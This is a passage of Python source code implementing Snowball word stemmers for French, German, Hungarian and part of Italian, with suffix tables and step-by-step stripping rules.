    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2a_suffixes: Suffixes to be deleted in step 2a of the algorithm.
    :type __step2a_suffixes: tuple
    :cvar __step2b_suffixes: Suffixes to be deleted in step 2b of the algorithm.
    :type __step2b_suffixes: tuple
    :cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
    :type __step4_suffixes: tuple
    :note: A detailed description of the French
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/french/stemmer.html
    """

    __vowels = "aeiouy\xE2\xE0\xEB\xE9\xEA\xE8\xEF\xEE\xF4\xFB\xF9"
    __step1_suffixes = ('issements', 'issement', 'atrices', 'atrice',
                        'ateurs', 'ations', 'logies', 'usions',
                        'utions', 'ements', 'amment', 'emment',
                        'ances', 'iqUes', 'ismes', 'ables', 'istes',
                        'ateur', 'ation', 'logie', 'usion', 'ution',
                        'ences', 'ement', 'euses', 'ments', 'ance',
                        'iqUe', 'isme', 'able', 'iste', 'ence',
                        'it\xE9s', 'ives', 'eaux', 'euse', 'ment',
                        'eux', 'it\xE9', 'ive', 'ifs', 'aux', 'if')
    __step2a_suffixes = ('issaIent', 'issantes', 'iraIent', 'issante',
                         'issants', 'issions', 'irions', 'issais',
                         'issait', 'issant', 'issent', 'issiez', 'issons',
                         'irais', 'irait', 'irent', 'iriez', 'irons',
                         'iront', 'isses', 'issez', '\xEEmes',
                         '\xEEtes', 'irai', 'iras', 'irez', 'isse',
                         'ies', 'ira', '\xEEt', 'ie', 'ir', 'is',
                         'it', 'i')
    __step2b_suffixes = ('eraIent', 'assions', 'erions', 'assent',
                         'assiez', '\xE8rent', 'erais', 'erait',
                         'eriez', 'erons', 'eront', 'aIent', 'antes',
                         'asses', 'ions', 'erai', 'eras', 'erez',
                         '\xE2mes', '\xE2tes', 'ante', 'ants',
                         'asse', '\xE9es', 'era', 'iez', 'ais',
                         'ait', 'ant', '\xE9e', '\xE9s', 'er',
                         'ez', '\xE2t', 'ai', 'as', '\xE9', 'a')
    __step4_suffixes = ('i\xE8re', 'I\xE8re', 'ion', 'ier', 'Ier',
                        'e', '\xEB')

    def stem(self, word):
        """
        Stem a French word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        step1_success = False
        rv_ending_found = False
        step2a_success = False
        step2b_success = False

        # Every occurrence of 'u' after 'q' is put into upper case.
        # Upper-case U/I/Y mark letters that must be treated as
        # consonants; they are lowered again at the end.
        for i in range(1, len(word)):
            if word[i-1] == "q" and word[i] == "u":
                word = "".join((word[:i], "U", word[i+1:]))

        # Every occurrence of 'u' and 'i'
        # between vowels is put into upper case.
        # Every occurrence of 'y' preceded or
        # followed by a vowel is also put into upper case.
        for i in range(1, len(word)-1):
            if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
                if word[i] == "u":
                    word = "".join((word[:i], "U", word[i+1:]))

                elif word[i] == "i":
                    word = "".join((word[:i], "I", word[i+1:]))

            if word[i-1] in self.__vowels or word[i+1] in self.__vowels:
                if word[i] == "y":
                    word = "".join((word[:i], "Y", word[i+1:]))

        r1, r2 = self._r1r2_standard(word, self.__vowels)
        rv = self.__rv_french(word, self.__vowels)

        # STEP 1: Standard suffix removal
        for suffix in self.__step1_suffixes:
            if word.endswith(suffix):
                if suffix == "eaux":
                    word = word[:-1]
                    step1_success = True

                elif suffix in ("euse", "euses"):
                    if suffix in r2:
                        word = word[:-len(suffix)]
                        step1_success = True

                    elif suffix in r1:
                        word = suffix_replace(word, suffix, "eux")
                        step1_success = True

                elif suffix in ("ement", "ements") and suffix in rv:
                    word = word[:-len(suffix)]
                    step1_success = True

                    # Strip residual iv/at, eus, abl/iqU, i\xE8r in turn.
                    if word[-2:] == "iv" and "iv" in r2:
                        word = word[:-2]

                        if word[-2:] == "at" and "at" in r2:
                            word = word[:-2]

                    elif word[-3:] == "eus":
                        if "eus" in r2:
                            word = word[:-3]

                        elif "eus" in r1:
                            word = "".join((word[:-1], "x"))

                    elif word[-3:] in ("abl", "iqU"):
                        if "abl" in r2 or "iqU" in r2:
                            word = word[:-3]

                    elif word[-3:] in ("i\xE8r", "I\xE8r"):
                        if "i\xE8r" in rv or "I\xE8r" in rv:
                            word = "".join((word[:-3], "i"))

                elif suffix == "amment" and suffix in rv:
                    word = suffix_replace(word, "amment", "ant")
                    rv = suffix_replace(rv, "amment", "ant")
                    # 'ant' remains for step 2b, so flag the RV ending.
                    rv_ending_found = True

                elif suffix == "emment" and suffix in rv:
                    word = suffix_replace(word, "emment", "ent")
                    rv_ending_found = True

                elif (suffix in ("ment", "ments") and suffix in rv and
                      not rv.startswith(suffix) and
                      rv[rv.rindex(suffix)-1] in self.__vowels):
                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    rv_ending_found = True

                elif suffix == "aux" and suffix in r1:
                    word = "".join((word[:-2], "l"))
                    step1_success = True

                elif (suffix in ("issement", "issements") and suffix in r1
                      and word[-len(suffix)-1] not in self.__vowels):
                    word = word[:-len(suffix)]
                    step1_success = True

                elif suffix in ("ance", "iqUe", "isme", "able", "iste",
                                "eux", "ances", "iqUes", "ismes",
                                "ables", "istes") and suffix in r2:
                    word = word[:-len(suffix)]
                    step1_success = True

                elif suffix in ("atrice", "ateur", "ation", "atrices",
                                "ateurs", "ations") and suffix in r2:
                    word = word[:-len(suffix)]
                    step1_success = True

                    if word[-2:] == "ic":
                        if "ic" in r2:
                            word = word[:-2]
                        else:
                            word = "".join((word[:-2], "iqU"))

                elif suffix in ("logie", "logies") and suffix in r2:
                    word = suffix_replace(word, suffix, "log")
                    step1_success = True

                elif (suffix in ("usion", "ution", "usions", "utions") and
                      suffix in r2):
                    word = suffix_replace(word, suffix, "u")
                    step1_success = True

                elif suffix in ("ence", "ences") and suffix in r2:
                    word = suffix_replace(word, suffix, "ent")
                    step1_success = True

                elif suffix in ("it\xE9", "it\xE9s") and suffix in r2:
                    word = word[:-len(suffix)]
                    step1_success = True

                    if word[-4:] == "abil":
                        if "abil" in r2:
                            word = word[:-4]
                        else:
                            word = "".join((word[:-2], "l"))

                    elif word[-2:] == "ic":
                        if "ic" in r2:
                            word = word[:-2]
                        else:
                            word = "".join((word[:-2], "iqU"))

                    elif word[-2:] == "iv":
                        if "iv" in r2:
                            word = word[:-2]

                elif (suffix in ("if", "ive", "ifs", "ives") and
                      suffix in r2):
                    word = word[:-len(suffix)]
                    step1_success = True

                    if word[-2:] == "at" and "at" in r2:
                        word = word[:-2]

                        if word[-2:] == "ic":
                            if "ic" in r2:
                                word = word[:-2]
                            else:
                                word = "".join((word[:-2], "iqU"))
                break

        # STEP 2a: Verb suffixes beginning 'i'
        # Only done if step 1 removed nothing, or left an amment/emment/
        # ment(s) ending in RV.
        if not step1_success or rv_ending_found:
            for suffix in self.__step2a_suffixes:
                if word.endswith(suffix):
                    if (suffix in rv and len(rv) > len(suffix) and
                        rv[rv.rindex(suffix)-1] not in self.__vowels):
                        word = word[:-len(suffix)]
                        step2a_success = True
                    break

            # STEP 2b: Other verb suffixes
            if not step2a_success:
                for suffix in self.__step2b_suffixes:
                    if rv.endswith(suffix):
                        if suffix == "ions" and "ions" in r2:
                            word = word[:-4]
                            step2b_success = True

                        elif suffix in ('eraIent', 'erions', '\xE8rent',
                                        'erais', 'erait', 'eriez',
                                        'erons', 'eront', 'erai', 'eras',
                                        'erez', '\xE9es', 'era', 'iez',
                                        '\xE9e', '\xE9s', 'er', 'ez',
                                        '\xE9'):
                            word = word[:-len(suffix)]
                            step2b_success = True

                        elif suffix in ('assions', 'assent', 'assiez',
                                        'aIent', 'antes', 'asses',
                                        '\xE2mes', '\xE2tes', 'ante',
                                        'ants', 'asse', 'ais', 'ait',
                                        'ant', '\xE2t', 'ai', 'as',
                                        'a'):
                            word = word[:-len(suffix)]
                            rv = rv[:-len(suffix)]
                            step2b_success = True

                            # A preceding 'e' in RV is removed as well.
                            if rv.endswith("e"):
                                word = word[:-1]
                        break

        # STEP 3
        if step1_success or step2a_success or step2b_success:
            if word[-1] == "Y":
                word = "".join((word[:-1], "i"))
            elif word[-1] == "\xE7":
                word = "".join((word[:-1], "c"))

        # STEP 4: Residual suffixes
        else:
            if (len(word) >= 2 and word[-1] == "s" and
                word[-2] not in "aiou\xE8s"):
                word = word[:-1]

            for suffix in self.__step4_suffixes:
                if word.endswith(suffix):
                    if suffix in rv:
                        if (suffix == "ion" and suffix in r2 and
                            rv[-4] in "st"):
                            word = word[:-3]

                        elif suffix in ("ier", "i\xE8re", "Ier",
                                        "I\xE8re"):
                            word = suffix_replace(word, suffix, "i")

                        elif suffix == "e":
                            word = word[:-1]

                        elif suffix == "\xEB" and word[-3:-1] == "gu":
                            word = word[:-1]
                    break

        # STEP 5: Undouble
        if word.endswith(("enn", "onn", "ett", "ell", "eill")):
            word = word[:-1]

        # STEP 6: Un-accent
        # NOTE(review): the `i += 1` below has no effect — reassigning a
        # `for` loop variable does not change iteration; kept as-is.
        for i in range(1, len(word)):
            if word[-i] not in self.__vowels:
                i += 1
            else:
                if i != 1 and word[-i] in ("\xE9", "\xE8"):
                    word = "".join((word[:-i], "e", word[-i+1:]))
                break

        # Restore the consonant markers introduced at the top.
        word = (word.replace("I", "i")
                    .replace("U", "u")
                    .replace("Y", "y"))

        return word

    def __rv_french(self, word, vowels):
        """
        Return the region RV that is used by the French stemmer.

        If the word begins with two vowels, RV is the region after
        the third letter. Otherwise, it is the region after the first
        vowel not at the beginning of the word, or the end of the word
        if these positions cannot be found. (Exceptionally, u'par',
        u'col' or u'tap' at the beginning of a word is also taken to
        define RV as the region to their right.)

        :param word: The French word whose region RV is determined.
        :type word: str or unicode
        :param vowels: The French vowels that are used to determine
                       the region RV.
        :type vowels: unicode
        :return: the region RV for the respective French word.
        :rtype: unicode
        :note: This helper method is invoked by the stem method of
               the subclass FrenchStemmer. It is not to be invoked directly!
        """
        rv = ""
        if len(word) >= 2:
            if (word.startswith(("par", "col", "tap")) or
                (word[0] in vowels and word[1] in vowels)):
                rv = word[3:]
            else:
                for i in range(1, len(word)):
                    if word[i] in vowels:
                        rv = word[i+1:]
                        break

        return rv
class GermanStemmer(_StandardStemmer):
    """
    The German Snowball stemmer.

    :cvar __vowels: The German vowels.
    :type __vowels: unicode
    :cvar __s_ending: Letters that may directly appear before a word final 's'.
    :type __s_ending: unicode
    :cvar __st_ending: Letter that may directly appear before a word final 'st'.
    :type __st_ending: unicode
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :note: A detailed description of the German
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/german/stemmer.html
    """

    __vowels = "aeiouy\xE4\xF6\xFC"
    __s_ending = "bdfghklmnrt"
    __st_ending = "bdfghklmnt"
    __step1_suffixes = ("ern", "em", "er", "en", "es", "e", "s")
    __step2_suffixes = ("est", "en", "er", "st")
    __step3_suffixes = ("isch", "lich", "heit", "keit",
                        "end", "ung", "ig", "ik")

    def stem(self, word):
        """
        Stem a German word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        word = word.replace("\xDF", "ss")

        # Every occurrence of 'u' and 'y'
        # between vowels is put into upper case, marking them as
        # consonants; they are lowered again at the end.
        for i in range(1, len(word)-1):
            if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
                if word[i] == "u":
                    word = "".join((word[:i], "U", word[i+1:]))

                elif word[i] == "y":
                    word = "".join((word[:i], "Y", word[i+1:]))

        r1, r2 = self._r1r2_standard(word, self.__vowels)

        # R1 is adjusted so that the region before it
        # contains at least 3 letters.
        # NOTE(review): `len(word[:i+1]) > 0` is always true here (i >= 1)
        # and the `== 0` branch is unreachable; dead code kept as-is.
        for i in range(1, len(word)):
            if word[i] not in self.__vowels and word[i-1] in self.__vowels:
                if len(word[:i+1]) < 3 and len(word[:i+1]) > 0:
                    r1 = word[3:]
                elif len(word[:i+1]) == 0:
                    return word
                break

        # STEP 1
        for suffix in self.__step1_suffixes:
            if r1.endswith(suffix):
                # e.g. 'kenntnissen' -> 'kenntnis': 'niss' loses one 's'
                # together with the suffix.
                if (suffix in ("en", "es", "e") and
                    word[-len(suffix)-4:-len(suffix)] == "niss"):
                    word = word[:-len(suffix)-1]
                    r1 = r1[:-len(suffix)-1]
                    r2 = r2[:-len(suffix)-1]

                elif suffix == "s":
                    # 's' is removed only after a valid s-ending letter.
                    if word[-2] in self.__s_ending:
                        word = word[:-1]
                        r1 = r1[:-1]
                        r2 = r2[:-1]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                break

        # STEP 2
        for suffix in self.__step2_suffixes:
            if r1.endswith(suffix):
                if suffix == "st":
                    # 'st' requires a valid st-ending letter and a stem of
                    # at least 3 characters.
                    if word[-3] in self.__st_ending and len(word[:-3]) >= 3:
                        word = word[:-2]
                        r1 = r1[:-2]
                        r2 = r2[:-2]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                break

        # STEP 3: Derivational suffixes
        for suffix in self.__step3_suffixes:
            if r2.endswith(suffix):
                if suffix in ("end", "ung"):
                    # Also strip a preceding 'ig' unless it follows 'e'.
                    if ("ig" in r2[-len(suffix)-2:-len(suffix)] and
                        "e" not in r2[-len(suffix)-3:-len(suffix)-2]):
                        word = word[:-len(suffix)-2]
                    else:
                        word = word[:-len(suffix)]

                elif (suffix in ("ig", "ik", "isch") and
                      "e" not in r2[-len(suffix)-1:-len(suffix)]):
                    word = word[:-len(suffix)]

                elif suffix in ("lich", "heit"):
                    # Also strip a preceding 'er' or 'en' in R1.
                    if ("er" in r1[-len(suffix)-2:-len(suffix)] or
                        "en" in r1[-len(suffix)-2:-len(suffix)]):
                        word = word[:-len(suffix)-2]
                    else:
                        word = word[:-len(suffix)]

                elif suffix == "keit":
                    # Also strip a preceding 'lich' or 'ig' in R2.
                    if "lich" in r2[-len(suffix)-4:-len(suffix)]:
                        word = word[:-len(suffix)-4]

                    elif "ig" in r2[-len(suffix)-2:-len(suffix)]:
                        word = word[:-len(suffix)-2]
                    else:
                        word = word[:-len(suffix)]
                break

        # Umlaut accents are removed and
        # 'u' and 'y' are put back into lower case.
        word = (word.replace("\xE4", "a").replace("\xF6", "o")
                    .replace("\xFC", "u").replace("U", "u")
                    .replace("Y", "y"))

        return word
class HungarianStemmer(_LanguageSpecificStemmer):
    """
    The Hungarian Snowball stemmer.

    :cvar __vowels: The Hungarian vowels.
    :type __vowels: unicode
    :cvar __digraphs: The Hungarian digraphs.
    :type __digraphs: tuple
    :cvar __double_consonants: The Hungarian double consonants.
    :type __double_consonants: tuple
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
    :type __step4_suffixes: tuple
    :cvar __step5_suffixes: Suffixes to be deleted in step 5 of the algorithm.
    :type __step5_suffixes: tuple
    :cvar __step6_suffixes: Suffixes to be deleted in step 6 of the algorithm.
    :type __step6_suffixes: tuple
    :cvar __step7_suffixes: Suffixes to be deleted in step 7 of the algorithm.
    :type __step7_suffixes: tuple
    :cvar __step8_suffixes: Suffixes to be deleted in step 8 of the algorithm.
    :type __step8_suffixes: tuple
    :cvar __step9_suffixes: Suffixes to be deleted in step 9 of the algorithm.
    :type __step9_suffixes: tuple
    :note: A detailed description of the Hungarian
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/hungarian/stemmer.html
    """

    __vowels = "aeiou\xF6\xFC\xE1\xE9\xED\xF3\xF5\xFA\xFB"
    __digraphs = ("cs", "dz", "dzs", "gy", "ly", "ny", "ty", "zs")
    __double_consonants = ("bb", "cc", "ccs", "dd", "ff", "gg",
                           "ggy", "jj", "kk", "ll", "lly", "mm",
                           "nn", "nny", "pp", "rr", "ss", "ssz",
                           "tt", "tty", "vv", "zz", "zzs")

    __step1_suffixes = ("al", "el")
    __step2_suffixes = ('k\xE9ppen', 'onk\xE9nt', 'enk\xE9nt',
                        'ank\xE9nt', 'k\xE9pp', 'k\xE9nt', 'ban',
                        'ben', 'nak', 'nek', 'val', 'vel', 't\xF3l',
                        't\xF5l', 'r\xF3l', 'r\xF5l', 'b\xF3l',
                        'b\xF5l', 'hoz', 'hez', 'h\xF6z',
                        'n\xE1l', 'n\xE9l', '\xE9rt', 'kor',
                        'ba', 'be', 'ra', 're', 'ig', 'at', 'et',
                        'ot', '\xF6t', 'ul', '\xFCl', 'v\xE1',
                        'v\xE9', 'en', 'on', 'an', '\xF6n',
                        'n', 't')
    __step3_suffixes = ("\xE1nk\xE9nt", "\xE1n", "\xE9n")
    __step4_suffixes = ('astul', 'est\xFCl', '\xE1stul',
                        '\xE9st\xFCl', 'stul', 'st\xFCl')
    __step5_suffixes = ("\xE1", "\xE9")
    __step6_suffixes = ('ok\xE9', '\xF6k\xE9', 'ak\xE9',
                        'ek\xE9', '\xE1k\xE9', '\xE1\xE9i',
                        '\xE9k\xE9', '\xE9\xE9i', 'k\xE9',
                        '\xE9i', '\xE9\xE9', '\xE9')
    __step7_suffixes = ('\xE1juk', '\xE9j\xFCk', '\xFCnk',
                        'unk', 'juk', 'j\xFCk', '\xE1nk',
                        '\xE9nk', 'nk', 'uk', '\xFCk', 'em',
                        'om', 'am', 'od', 'ed', 'ad', '\xF6d',
                        'ja', 'je', '\xE1m', '\xE1d', '\xE9m',
                        '\xE9d', 'm', 'd', 'a', 'e', 'o',
                        '\xE1', '\xE9')
    __step8_suffixes = ('jaitok', 'jeitek', 'jaink', 'jeink', 'aitok',
                        'eitek', '\xE1itok', '\xE9itek', 'jaim',
                        'jeim', 'jaid', 'jeid', 'eink', 'aink',
                        'itek', 'jeik', 'jaik', '\xE1ink',
                        '\xE9ink', 'aim', 'eim', 'aid', 'eid',
                        'jai', 'jei', 'ink', 'aik', 'eik',
                        '\xE1im', '\xE1id', '\xE1ik', '\xE9im',
                        '\xE9id', '\xE9ik', 'im', 'id', 'ai',
                        'ei', 'ik', '\xE1i', '\xE9i', 'i')
    __step9_suffixes = ("\xE1k", "\xE9k", "\xF6k", "ok",
                        "ek", "ak", "k")

    def stem(self, word):
        """
        Stem an Hungarian word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        r1 = self.__r1_hungarian(word, self.__vowels, self.__digraphs)

        # STEP 1: Remove instrumental case
        # e.g. 'fakkal' -> 'fa': the suffix plus the doubled consonant's
        # second half are removed together.
        if r1.endswith(self.__step1_suffixes):
            for double_cons in self.__double_consonants:
                if word[-2-len(double_cons):-2] == double_cons:
                    word = "".join((word[:-4], word[-3]))

                    if r1[-2-len(double_cons):-2] == double_cons:
                        r1 = "".join((r1[:-4], r1[-3]))
                    break

        # STEP 2: Remove frequent cases
        for suffix in self.__step2_suffixes:
            if word.endswith(suffix):
                if r1.endswith(suffix):
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]

                    # A remaining accented final vowel is un-accented.
                    if r1.endswith("\xE1"):
                        word = "".join((word[:-1], "a"))
                        r1 = suffix_replace(r1, "\xE1", "a")

                    elif r1.endswith("\xE9"):
                        word = "".join((word[:-1], "e"))
                        r1 = suffix_replace(r1, "\xE9", "e")
                break

        # STEP 3: Remove special cases
        for suffix in self.__step3_suffixes:
            if r1.endswith(suffix):
                if suffix == "\xE9n":
                    word = suffix_replace(word, suffix, "e")
                    r1 = suffix_replace(r1, suffix, "e")
                else:
                    word = suffix_replace(word, suffix, "a")
                    r1 = suffix_replace(r1, suffix, "a")
                break

        # STEP 4: Remove other cases
        for suffix in self.__step4_suffixes:
            if r1.endswith(suffix):
                if suffix == "\xE1stul":
                    word = suffix_replace(word, suffix, "a")
                    r1 = suffix_replace(r1, suffix, "a")

                elif suffix == "\xE9st\xFCl":
                    word = suffix_replace(word, suffix, "e")
                    r1 = suffix_replace(r1, suffix, "e")
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                break

        # STEP 5: Remove factive case
        # As in step 1, a doubled consonant before the suffix is undoubled.
        for suffix in self.__step5_suffixes:
            if r1.endswith(suffix):
                for double_cons in self.__double_consonants:
                    if word[-1-len(double_cons):-1] == double_cons:
                        word = "".join((word[:-3], word[-2]))

                        if r1[-1-len(double_cons):-1] == double_cons:
                            r1 = "".join((r1[:-3], r1[-2]))
                        break

        # STEP 6: Remove owned
        for suffix in self.__step6_suffixes:
            if r1.endswith(suffix):
                if suffix in ("\xE1k\xE9", "\xE1\xE9i"):
                    word = suffix_replace(word, suffix, "a")
                    r1 = suffix_replace(r1, suffix, "a")

                elif suffix in ("\xE9k\xE9", "\xE9\xE9i",
                                "\xE9\xE9"):
                    word = suffix_replace(word, suffix, "e")
                    r1 = suffix_replace(r1, suffix, "e")
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                break

        # STEP 7: Remove singular owner suffixes
        for suffix in self.__step7_suffixes:
            if word.endswith(suffix):
                if r1.endswith(suffix):
                    if suffix in ("\xE1nk", "\xE1juk", "\xE1m",
                                  "\xE1d", "\xE1"):
                        word = suffix_replace(word, suffix, "a")
                        r1 = suffix_replace(r1, suffix, "a")

                    elif suffix in ("\xE9nk", "\xE9j\xFCk",
                                    "\xE9m", "\xE9d", "\xE9"):
                        word = suffix_replace(word, suffix, "e")
                        r1 = suffix_replace(r1, suffix, "e")
                    else:
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                break

        # STEP 8: Remove plural owner suffixes
        for suffix in self.__step8_suffixes:
            if word.endswith(suffix):
                if r1.endswith(suffix):
                    if suffix in ("\xE1im", "\xE1id", "\xE1i",
                                  "\xE1ink", "\xE1itok", "\xE1ik"):
                        word = suffix_replace(word, suffix, "a")
                        r1 = suffix_replace(r1, suffix, "a")

                    elif suffix in ("\xE9im", "\xE9id", "\xE9i",
                                    "\xE9ink", "\xE9itek", "\xE9ik"):
                        word = suffix_replace(word, suffix, "e")
                        r1 = suffix_replace(r1, suffix, "e")
                    else:
                        word = word[:-len(suffix)]
                        r1 = r1[:-len(suffix)]
                break

        # STEP 9: Remove plural suffixes
        for suffix in self.__step9_suffixes:
            if word.endswith(suffix):
                if r1.endswith(suffix):
                    if suffix == "\xE1k":
                        word = suffix_replace(word, suffix, "a")
                    elif suffix == "\xE9k":
                        word = suffix_replace(word, suffix, "e")
                    else:
                        word = word[:-len(suffix)]
                break

        return word

    def __r1_hungarian(self, word, vowels, digraphs):
        """
        Return the region R1 that is used by the Hungarian stemmer.

        If the word begins with a vowel, R1 is defined as the region
        after the first consonant or digraph (= two letters stand for
        one phoneme) in the word. If the word begins with a consonant,
        it is defined as the region after the first vowel in the word.
        If the word does not contain both a vowel and consonant, R1
        is the null region at the end of the word.

        :param word: The Hungarian word whose region R1 is determined.
        :type word: str or unicode
        :param vowels: The Hungarian vowels that are used to determine
                       the region R1.
        :type vowels: unicode
        :param digraphs: The digraphs that are used to determine the
                         region R1.
        :type digraphs: tuple
        :return: the region R1 for the respective word.
        :rtype: unicode
        :note: This helper method is invoked by the stem method of the subclass
               HungarianStemmer. It is not to be invoked directly!
        """
        r1 = ""
        if word[0] in vowels:
            for digraph in digraphs:
                if digraph in word[1:]:
                    r1 = word[word.index(digraph[-1])+1:]
                    return r1

            for i in range(1, len(word)):
                if word[i] not in vowels:
                    r1 = word[i+1:]
                    break
        else:
            for i in range(1, len(word)):
                if word[i] in vowels:
                    r1 = word[i+1:]
                    break

        return r1
class ItalianStemmer(_StandardStemmer):
    """
    The Italian Snowball stemmer.

    :cvar __vowels: The Italian vowels.
    :type __vowels: unicode
    :cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
    :type __step0_suffixes: tuple
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :note: A detailed description of the Italian
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/italian/stemmer.html
    """

    __vowels = "aeiou\xE0\xE8\xEC\xF2\xF9"
    __step0_suffixes = ('gliela', 'gliele', 'glieli', 'glielo',
                        'gliene', 'sene', 'mela', 'mele', 'meli',
                        'melo', 'mene', 'tela', 'tele', 'teli',
                        'telo', 'tene', 'cela', 'cele', 'celi',
                        'celo', 'cene', 'vela', 'vele', 'veli',
                        'velo', 'vene', 'gli', 'ci', 'la', 'le',
                        'li', 'lo', 'mi', 'ne', 'si', 'ti', 'vi')
    __step1_suffixes = ('atrice', 'atrici', 'azione', 'azioni',
                        'uzione', 'uzioni', 'usione', 'usioni',
                        'amento', 'amenti', 'imento', 'imenti',
                        'amente', 'abile', 'abili', 'ibile', 'ibili',
                        'mente', 'atore', 'atori', 'logia', 'logie',
                        'anza', 'anze', 'iche', 'ichi', 'ismo',
                        'ismi', 'ista', 'iste', 'isti', 'ist\xE0',
                        'ist\xE8', 'ist\xEC', 'ante', 'anti',
                        'enza', 'enze', 'ico', 'ici', 'ica', 'ice',
                        'oso', 'osi', 'osa', 'ose', 'it\xE0',
                        'ivo', 'ivi', 'iva', 'ive')
    __step2_suffixes = ('erebbero', 'irebbero', 'assero', 'assimo',
                        'eranno', 'erebbe', 'eremmo', 'ereste',
                        'eresti', 'essero', 'iranno', 'irebbe',
                        'iremmo', 'ireste', 'iresti', 'iscano',
                        'iscono', 'issero', 'arono', 'avamo', 'avano',
                        'avate', 'eremo', 'erete', 'erono', 'evamo',
                        'evano', 'evate', 'iremo', 'irete', 'irono',
                        'ivamo', 'ivano', 'ivate', 'ammo', 'ando',
                        'asse', 'assi', 'emmo', 'enda', 'ende',
                        'endi', 'endo', 'erai', 'erei', 'Yamo',
                        'iamo', 'immo', 'irai', 'irei', 'isca',
                        'isce', 'isci', 'isco', 'ano', 'are', 'ata',
                        'ate', 'ati', 'ato', 'ava', 'avi', 'avo',
                        'er\xE0', 'ere', 'er\xF2', 'ete', 'eva',
                        'evi', 'evo', 'ir\xE0', 'ire', 'ir\xF2',
                        'ita', 'ite', 'iti', 'ito', 'iva', 'ivi',
                        'ivo', 'ono', 'uta', 'ute', 'uti', 'uto',
                        'ar', 'ir')

    def stem(self, word):
        """
        Stem an Italian word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        # Step 2 (verb suffixes) only runs if step 1 removed nothing.
        step1_success = False

        # All acute accents are replaced by grave accents.
        word = (word.replace("\xE1", "\xE0")
                    .replace("\xE9", "\xE8")
                    .replace("\xED", "\xEC")
                    .replace("\xF3", "\xF2")
                    .replace("\xFA", "\xF9"))

        # Every occurrence of 'u' after 'q'
        # is put into upper case.
        for i in range(1, len(word)):
            if word[i-1] == "q" and word[i] == "u":
                word = "".join((word[:i], "U", word[i+1:]))

        # Every occurrence of 'u' and 'i'
        # between vowels is put into upper case.
        # (Upper case marks consonantal use; undone at the end.)
        for i in range(1, len(word)-1):
            if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
                if word[i] == "u":
                    word = "".join((word[:i], "U", word[i+1:]))

                elif word[i] == "i":
                    word = "".join((word[:i], "I", word[i+1:]))

        # R1/R2/RV are tracked as suffix strings of `word`; each deletion
        # must shrink them by the same amount as `word` to keep the
        # regions aligned.
        r1, r2 = self._r1r2_standard(word, self.__vowels)
        rv = self._rv_standard(word, self.__vowels)

        # STEP 0: Attached pronoun
        for suffix in self.__step0_suffixes:
            if rv.endswith(suffix):
                if rv[-len(suffix)-4:-len(suffix)] in ("ando", "endo"):
                    # Gerund + pronoun: delete the pronoun.
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]

                elif (rv[-len(suffix)-2:-len(suffix)] in
                      ("ar", "er", "ir")):
                    # Infinitive + pronoun: replace the pronoun with 'e'.
                    word = suffix_replace(word, suffix, "e")
                    r1 = suffix_replace(r1, suffix, "e")
                    r2 = suffix_replace(r2, suffix, "e")
                    rv = suffix_replace(rv, suffix, "e")
                break

        # STEP 1: Standard suffix removal
        for suffix in self.__step1_suffixes:
            if word.endswith(suffix):
                if suffix == "amente" and r1.endswith(suffix):
                    step1_success = True
                    word = word[:-6]
                    r2 = r2[:-6]
                    rv = rv[:-6]

                    # Strip residual iv(+at), os/ic or abil in R2.
                    if r2.endswith("iv"):
                        word = word[:-2]
                        r2 = r2[:-2]
                        rv = rv[:-2]

                        if r2.endswith("at"):
                            word = word[:-2]
                            rv = rv[:-2]

                    elif r2.endswith(("os", "ic")):
                        word = word[:-2]
                        rv = rv[:-2]

                    elif r2.endswith("abil"):
                        word = word[:-4]
                        rv = rv[:-4]

                elif (suffix in ("amento", "amenti",
                                 "imento", "imenti") and
                      rv.endswith(suffix)):
                    step1_success = True
                    word = word[:-6]
                    rv = rv[:-6]

